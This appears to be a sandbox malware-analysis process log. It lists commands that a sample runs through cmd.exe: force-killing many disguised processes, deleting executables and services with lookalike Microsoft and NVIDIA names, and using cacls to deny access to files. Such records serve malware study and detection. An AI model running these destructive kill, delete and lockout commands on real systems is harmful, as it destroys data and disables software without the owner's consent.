C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft BnibabsProt00\Gsmarn64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft BnibabsProt00\Gsmarn64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Globalan.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Globalan.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %systemroot%\SystemSvlsa\Globalan.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\SystemSvlsa\Globalan.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Globalan.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Globalan.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "NVIDIA SlibabaProtect GlobalSign"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "NVIDIA SlibabaProtect GlobalSign"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "NVIDIA SlibabaProtect GlobalSign"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "NVIDIA SlibabaProtect GlobalSign"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Nsmart64.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Nsmart64.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Nsmart32.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Nsmart32.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft AlibabaProt\Nsmart64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft AlibabaProt\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft AlibabaProt\Nsmart64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft AlibabaProt\Nsmart32.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft AlibabaProt\Nsmart32.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft AlibabaProt\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft AlibabaProt\Nsmart32.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft AlibabaProt\Nsmart64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%Microsoft AlibabaProt00\Nsmart64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im NGlobalan.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im NGlobalan.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft AlibabaProt00\Nsmart64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft AlibabaProt00\Nsmart64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft AlibabaProt00\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %systemroot%\SystemNvlsa\NGlobalan.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\SystemNvlsa\NGlobalan.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im NGlobalan.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im NGlobalan.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "NVIDIA AlibabaProtect GlobalSign"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "NVIDIA AlibabaProtect GlobalSign"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "NVIDIA AlibabaProtect GlobalSign"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "NVIDIA AlibabaProtect GlobalSign"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im NVDispla64.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im NVDispla64.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft NctiveStec\NVDispla64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft NctiveStec\NVDispla64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft NctiveStec\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft NctiveStec\NVDispla64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft NctiveStec00\NVDispla64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft NctiveStec00\NVDispla64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft NctiveStec00\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%Microsoft NctiveStec00\NVDispla64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Nvdskrais.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Nvdskrais.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\SystemBols\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\SystemBols\Nvdskrais.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %systemroot%SystemBols\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %systemroot%SystemBols\Nvdskrais.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im NVDispla64.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im NVDispla64.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft NctiveStec\NVDispla64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Nvdskrais.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Nvdskrais.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "NVIDIA windows dribs container"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "NVIDIA windows dribs container"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "NVIDIA windows dribs container"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "NVIDIA windows dribs container"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft NctiveStec\NVDispla64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft NctiveStec\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft NctiveStec\NVDispla64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Diskraid.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Diskraid.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %systemroot%SystemBols\Diskraid.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\SystemBols\Diskraid.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Sqltem64.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Sqltem64.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\Sqltem64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\Sqltem64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft SQL Server\Sqltem64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Diskraid.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Diskraid.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "dorporati windows dribe diskraid"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "dorporati windows dribe diskraid"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "dorporati windows dribe diskraid"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "dorporati windows dribe diskraid"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im AppVNice.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im AppVNice.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\SystemBols\AppVNice.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %systemroot%SystemBols\AppVNice.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Systen64.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Systen64.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SystelApp\Systen64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SystelApp\Systen64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft SystelApp\Systen64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im AppVNice.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im AppVNice.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Norporati Windows AppVNice"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Norporati Windows AppVNice"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Norporati Windows AppVNice"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Norporati Windows AppVNice"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im taskger.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskger.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\taskger.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\taskger.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im taskmgzr.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgzr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\taskmgzr.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\taskmgzr.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\vget.vbs2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\vget.vbs2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im assm.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im assm.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls assm.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls assm.exe /t /e /c /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls assm.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls assm.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SqlManagement.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SqlManagement.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls SqlManagement.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls SqlManagement.exe /t /e /c /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls SqlManagement.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls SqlManagement.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SystemManagement.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SystemManagement.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls SystemManagement.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls SystemManagement.exe /t /e /c /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls SystemManagement.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls SystemManagement.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im msinfo.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im msinfo.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls msinfo.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls msinfo.exe /t /e /c /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im rundlls.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rundlls.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls msinfo.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls msinfo.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls rundlls.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls rundlls.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls rundlls.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls rundlls.exe /t /e /c /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhoy.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhoy.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls conhoy.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls conhoy.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls conhoy.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls conhoy.exe /t /e /c /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im OmdBase.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im OmdBase.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls OmdBase.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls OmdBase.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls System.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls System.exe /t /e /c /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im System.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im System.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls OmdBase.exe /t /e /c /d everyone2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls OmdBase.exe /t /e /c /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Cacls System.exe /t /e /c /d system2⤵
-
C:\Windows\SysWOW64\cacls.exeCacls System.exe /t /e /c /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im spoolys.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spoolys.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im OmdBase.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im OmdBase.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft Maker\OmdBase.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Windows DVD Maker"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Windows DVD Maker"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Windows DVD Maker"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Windows DVD Maker"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft Maker\OmdBase.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft Maker\OmdBase.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im GthUdTask.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im GthUdTask.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Assemblies GthUdTask"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Assemblies GthUdTask"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Assemblies GthUdTask"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Assemblies GthUdTask"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft GthUdTask\GthUdTask.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft GthUdTask\GthUdTask.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft GthUdTask\GthUdTask.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im BthUdTask.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im BthUdTask.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Assemblies BthUdTask"2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Assemblies BthUdTask"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Assemblies BthUdTask"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Assemblies BthUdTask"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft BthUdTask\BthUdTask.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft BthUdTask\BthUdTask.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft BthUdTask\BthUdTask.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SvidaPctb.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SvidaPctb.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SvidaPctb\SvidaPctb.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft SvidaPctb\SvidaPctb.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SvidaPctb\SvidaPctb.exe2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im WavesSys.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WavesSys.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Assemblies WavesSys"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Assemblies WavesSys"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Assemblies WavesSys"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Assemblies WavesSys"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im System.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im System.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft StuSystem\System.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft StuSystem\System.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft StuSystem\System.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Nvdxgiwrap.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Nvdxgiwrap.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Windows Nvdxgiwrap"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Windows Nvdxgiwrap"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Windows Nvdxgiwrap"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Windows Nvdxgiwrap"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Windows Rsytvcem"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Windows Rsytvcem"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "Corporati Windows Rsytvcem"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Corporati Windows Rsytvcem"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Rsytvcp.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rsytvcp.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft Rsytvcem\Rsytvcp.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft Rsytvcem\Rsytvcp.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft Rsytvcem\Rsytvcp.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Systen64.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Systen64.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SystenApp\Systen64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft SystenApp\Systen64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SystenApp\Systen64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im spoolys.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spoolys.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\Help\spoolys.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im lsma12.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im lsma12.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\INF\aspnet\lsma12.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im lsma22.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im lsma22.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\INF\aspnet\lsma22.exe2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im assm.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im assm.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\assm.exe2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\assm.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sqlcmd.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sqlcmd.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\sqlcmd.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\sqlcmd.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhos.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhos.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhos.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhos.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhou.exe2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhou.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhou.exe2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhou.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im m6.bin.bin.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im m6.bin.bin.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im javaw.exe2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im javaw.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im clsso.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im clsso.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im conhoz.exe2⤵
-
